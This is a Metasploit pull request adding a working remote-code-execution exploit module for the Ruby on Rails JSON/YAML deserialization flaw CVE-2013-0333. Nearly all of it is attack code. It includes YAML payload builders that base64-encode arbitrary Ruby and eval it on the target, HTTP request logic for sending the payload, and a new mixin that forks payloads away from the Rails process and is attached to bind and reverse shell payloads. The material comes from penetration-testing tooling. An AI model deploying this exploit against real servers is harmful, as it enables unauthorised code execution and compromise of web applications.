### PR TITLE
Exploit for cve-2013-0333

### DIFF
--- a/lib/msf/core/payload/ruby.rb
+++ b/lib/msf/core/payload/ruby.rb
@@ -1,0 +1,39 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::Ruby
+
+	def initialize(info = {})
+		super(info)
+
+		register_advanced_options(
+			[
+				# Since space restrictions aren't really a problem, default this to
+				# true.
+				Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
+			]
+		)
+	end
+
+	def prepends(buf)
+		if datastore['PrependFork']
+			buf = %Q^
+				code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first
+				if RUBY_PLATFORM =~ /mswin|mingw|win32/
+					inp = IO.popen(%(ruby), %(wb)) rescue nil
+					if inp
+						inp.write(code)
+						inp.close
+					end
+				else
+					if ! Process.fork()
+						eval(code) rescue nil
+					end
+				end
+			^.strip.split(/\n/).map{|line| line.strip}.join("\n")
+		end
+
+		buf
+	end
+
+end

--- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
@@ -6,7 +6,6 @@
 ##
 
 require 'msf/core'
-require 'yaml'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@@ -18,24 +17,27 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
 			'Description'    => %q{
-					This module exploits a remote code execution vulnerability in the JSON request
-				processor of the Ruby on Rails application framework. This vulnerability allows
-				an attacker to instantiate a remote object, which in turn can be used to execute
-				any ruby code remotely in the context of the application.
+					This module exploits a remote code execution vulnerability in the
+				JSON request processor of the Ruby on Rails application framework.
+				This vulnerability allows an attacker to instantiate a remote object,
+				which in turn can be used to execute any ruby code remotely in the
+				context of the application. This vulnerability is very similar to
+				CVE-2013-0156
 
-				This module has been tested on RoR 3.0.19
+				This module has been tested successfully on RoR 3.0.9, 3.0.19, and
+				2.3.15.
 
-				The technique used by this module requires the target to be running a fairly recent
-				version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be
-				exploitable using the init_with() method, but this has not been demonstrated.
+				The technique used by this module requires the target to be running a
+				fairly recent version of Ruby 1.9 (since 2011 or so). Applications
+				using Ruby 1.8 may still be exploitable using the init_with() method,
+				but this has not been demonstrated.
 
 			},
 			'Author'         =>
 				[
-					'charliesome',  # PoC
-					'espes',        # PoC and Metasploit module
-					'lian',         # Identified the RouteSet::NamedRouteCollection vector
-					'hdm'           # Module merge/conversion/payload work
+					'jjarmoc',  # Initial module based on cve-2013-0156, testing help
+					'egypt',    # Module
+					'lian',     # Identified the RouteSet::NamedRouteCollection vector
 				],
 			'License'        => MSF_LICENSE,
 			'References'  =>
@@ -106,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		[2, 3].each do |ver|
 			print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
 			send_request_cgi({
-				'uri'     => datastore['URIPATH'] || "/",
+				'uri'     => normalize_uri(target_uri.path),
 				'method'  => datastore['HTTP_METHOD'],
 				'ctype'   => 'application/json',
 				'headers' => { 'X-HTTP-Method-Override' => 'get' },

--- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
@@ -103,7 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	# Send the actual request
 	#
 	def exploit
-		p payload.encoded
 
 		[2, 3].each do |ver|
 			print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")

--- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
@@ -1,0 +1,109 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'yaml'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::CmdStagerTFTP
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
+			'Description'    => %q{
+					This module exploits a remote code execution vulnerability in the JSON request
+				processor of the Ruby on Rails application framework. This vulnerability allows
+				an attacker to instantiate a remote object, which in turn can be used to execute
+				any ruby code remotely in the context of the application.
+
+				This module has been tested on RoR 3.0.19
+
+				The technique used by this module requires the target to be running a fairly recent
+				version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be
+				exploitable using the init_with() method, but this has not been demonstrated.
+
+			},
+			'Author'         =>
+				[
+					'charliesome',  # PoC
+					'espes',        # PoC and Metasploit module
+					'lian',         # Identified the RouteSet::NamedRouteCollection vector
+					'hdm'           # Module merge/conversion/payload work
+				],
+			'License'        => MSF_LICENSE,
+			'References'  =>
+				[
+					['CVE', '2013-0333'],
+				],
+			'Platform'       => 'ruby',
+			'Arch'           => ARCH_RUBY,
+			'Privileged'     => false,
+			'Targets'        =>	[ ['Automatic', {} ] ],
+			'DisclosureDate' => 'Jan 28 2013',
+			'DefaultTarget' => 0))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+				OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
+				OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
+
+			], self.class)
+
+	end
+
+	#
+	# Create the YAML document that will be embedded into the JSON
+	#
+	def build_yaml_rails2
+
+		code = Rex::Text.encode_base64(payload.encoded)
+		yaml =
+			"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
+			"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
+			"eval(%[#{code}].unpack(%[m0])[0]);' " +
+			": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
+			":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
+			":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
+		yaml.gsub(':', '\u003a')
+	end
+
+
+	#
+	# Create the YAML document that will be embedded into the JSON
+	#
+	def build_yaml_rails3
+
+		code = Rex::Text.encode_base64(payload.encoded)
+		yaml =
+			"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
+			"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
+			": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
+		yaml.gsub(':', '\u003a')
+	end
+
+
+	#
+	# Send the actual request
+	#
+	def exploit
+
+		print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
+		send_request_cgi({
+			'uri'     => normalize_uri(target_uri.path),
+			'method'  => datastore['HTTP_METHOD'],
+			'ctype'   => 'application/json',
+			'headers' => { 'X-HTTP-Method-Override' => 'get' },
+			'data'    => build_yaml_rails3
+		}, 25)
+		handler
+
+	end
+end

--- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
@@ -90,6 +90,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		yaml.gsub(':', '\u003a')
 	end
 
+	def build_request(v)
+		case v
+		when 2; build_yaml_rails2
+		when 3; build_yaml_rails3
+		end
+	end
 
 	#
 	# Send the actual request
@@ -97,14 +103,17 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		p payload.encoded
 
-		print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
-		send_request_cgi({
-			'uri'     => normalize_uri(target_uri.path),
-			'method'  => datastore['HTTP_METHOD'],
-			'ctype'   => 'application/json',
-			'headers' => { 'X-HTTP-Method-Override' => 'get' },
-			'data'    => build_yaml_rails3
-		}, 25)
+		[2, 3].each do |ver|
+			print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
+			send_request_cgi({
+				'uri'     => datastore['URIPATH'] || "/",
+				'method'  => datastore['HTTP_METHOD'],
+				'ctype'   => 'application/json',
+				'headers' => { 'X-HTTP-Method-Override' => 'get' },
+				'data'    => build_request(ver)
+			}, 25)
+			handler
+		end
 
 	end
 end

--- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => false,
 			'Targets'        =>	[ ['Automatic', {} ] ],
 			'DisclosureDate' => 'Jan 28 2013',
+			'DefaultOptions' => { "PrependFork" => true },
 			'DefaultTarget' => 0))
 
 		register_options(
@@ -94,6 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# Send the actual request
 	#
 	def exploit
+		p payload.encoded
 
 		print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
 		send_request_cgi({
@@ -103,7 +105,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			'headers' => { 'X-HTTP-Method-Override' => 'get' },
 			'data'    => build_yaml_rails3
 		}, 25)
-		handler
 
 	end
 end

--- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => false,
 			'Targets'        =>	[ ['Automatic', {} ] ],
 			'DisclosureDate' => 'Jan 7 2013',
+			'DefaultOptions' => { "PrependFork" => true },
 			'DefaultTarget' => 0))
 
 		register_options(
@@ -63,35 +64,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class)
 	end
 
-
-	#
-	# This stub ensures that the payload runs outside of the Rails process
-	# Otherwise, the session can be killed on timeout
-	#
-	def detached_payload_stub(code)
-	%Q^
-		code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first
-		if RUBY_PLATFORM =~ /mswin|mingw|win32/
-			inp = IO.popen("ruby", "wb") rescue nil
-			if inp
-				inp.write(code)
-				inp.close
-			end
-		else
-			if ! Process.fork()
-				eval(code) rescue nil
-			end
-		end
-	^.strip.split(/\n/).map{|line| line.strip}.join("\n")
-	end
-
 	#
 	# Create the YAML document that will be embedded into the XML
 	#
 	def build_yaml_rails2
 
-		# Embed the payload with the detached stub
-		code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
+		code = Rex::Text.encode_base64(payload.encoded)
 		yaml =
 			"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
 			"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
@@ -108,8 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def build_yaml_rails3
 
-		# Embed the payload with the detached stub
-		code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
+		code = Rex::Text.encode_base64(payload.encoded)
 		yaml =
 			"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
 			"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
@@ -164,24 +141,17 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def exploit
 
-		print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
-		res = send_request_cgi({
-			'uri'     => datastore['URIPATH'] || "/",
-			'method'  => datastore['HTTP_METHOD'],
-			'ctype'   => 'application/xml',
-			'headers' => { 'X-HTTP-Method-Override' => 'get' },
-			'data'    => build_request(3)
-		}, 25)
-		handler
+		[2, 3].each do |ver|
+			print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
+			send_request_cgi({
+				'uri'     => datastore['URIPATH'] || "/",
+				'method'  => datastore['HTTP_METHOD'],
+				'ctype'   => 'application/xml',
+				'headers' => { 'X-HTTP-Method-Override' => 'get' },
+				'data'    => build_request(ver)
+			}, 25)
+			handler
+		end
 
-		print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
-		res = send_request_cgi({
-			'uri'     => datastore['URIPATH'] || "/",
-			'method'  => datastore['HTTP_METHOD'],
-			'ctype'   => 'application/xml',
-			'headers' => { 'X-HTTP-Method-Override' => 'get' },
-			'data'    => build_request(2)
-		}, 25)
-		handler
 	end
 end

--- a/modules/payloads/singles/ruby/shell_bind_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_bind_tcp.rb
@@ -6,6 +6,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/ruby'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
 	include Msf::Payload::Single
+	include Msf::Payload::Ruby
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
@@ -31,7 +33,7 @@ module Metasploit3
 	end
 
 	def generate
-		return super + ruby_string
+		return prepends(ruby_string)
 	end
 
 	def ruby_string

--- a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
+++ b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
@@ -6,6 +6,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/ruby'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
 	include Msf::Payload::Single
+	include Msf::Payload::Ruby
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
@@ -31,7 +33,7 @@ module Metasploit3
 	end
 
 	def generate
-		return super + ruby_string
+		return prepends(ruby_string)
 	end
 
 	def ruby_string

--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
@@ -6,6 +6,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/ruby'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
 	include Msf::Payload::Single
+	include Msf::Payload::Ruby
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
@@ -31,7 +33,7 @@ module Metasploit3
 	end
 
 	def generate
-		return super + ruby_string
+		return prepends(ruby_string)
 	end
 
 	def ruby_string


### PR DESCRIPTION
- Adds an exploit for rails json parsing
- Pulls forking payload stuff out of the old rails module (rails_xml_yaml_code_exec, cve-2013-0156) into a new Payload::Ruby mixin.
